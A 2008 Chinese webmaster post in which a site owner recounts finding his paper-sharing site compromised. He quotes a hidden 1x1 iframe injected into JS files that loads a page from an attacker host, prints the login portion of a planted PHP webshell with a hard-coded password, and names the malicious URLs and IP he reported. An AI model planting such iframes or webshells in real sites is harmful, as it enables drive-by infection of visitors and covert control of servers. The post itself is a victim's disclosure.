当前位置：首页 > 新闻资讯 > 站长休闲 > > 论文网站被挂马在此揭露挂马者蛛丝马迹

论文网站被挂马在此揭露挂马者蛛丝马迹

点击次数：32 次发布日期：2008-11-18 13:28:10 作者：源代码网

源代码网推荐

源代码网整理以下前两天朋友说我的网站被挂马，当时我没在意，我在自己的电脑上打开自己的网站免费论文网http://www.100paper.com，没发现挂马啊，我用的是费尔杀毒软件，没发现有挂马的迹象，没有报毒啊，自己也就没在意。昨天我来服务器上看看，发现有几个js文件多了点东西，里面都多了一行代码：<iframe src=http://xindizhi88.com/5.htmwidth=1 height=1></iframe>，一看就知道，典型的挂马方式，赶紧删除了，然后又在整个网站搜索了一下xindizhi88.com这个词，再没有发现，就作罢了，心里还高兴呢。今天在服务器上装了一个费尔杀毒软件，竟然发现有一个文件mychannel_ coon.php，打开看到里面的代码：<?php
error_reporting(0); //If there is an error, we"ll show it, k?

源代码网整理以下$password = "ay13y"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.

源代码网整理以下$me = basename(__FILE__);
$cookiename = "ay13y";

源代码网整理以下
if(isset($_POST["pass"])) //If the user made a login attempt, "pass" will be set eh?
{

源代码网整理以下 if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
{
$_POST["pass"] = md5($_POST["pass"]);
}

源代码网整理以下 if($_POST["pass"] == $password)
{
setcookie($cookiename, $_POST["pass"], time()+3600); //It"s alright, let hem in
}
reload();
}

源代码网整理以下

源代码网整理以下if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
login();
die();
}
//
//Do not cross this line! All code placed after this block can"t be executed without being logged in!
//

源代码网整理以下if(isset($_GET["p"]) && $_GET["p"] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET["dir"]))
{
chdir($_GET["dir"]);
}

源代码网整理以下一看就知道不是什么好鸟，删除！

源代码网整理以下　　这个种马的人真够可恶的，经过我仔细查找，发现在我的data目录下，建立一个textdata1目录，然后写入

源代码网整理以下

源代码网整理以下　　这几个文件，其中扩展名vir是费尔杀毒软件自动查找发现是木马后自动加入的，太可怕了!我的站一点安全感都没有了，经过几次查找现在发现两个地址:http://60.190.118.233/3.htm ，http://xindizhi88.com/5.htm，这个两个地址是挂马者用的，我已经把这两个地址举报了，我想一个ip，一个地址所提供的信息肯定能找到这个挂马的人，更可气的是这个挂马的人还用cnzz的统计，见图: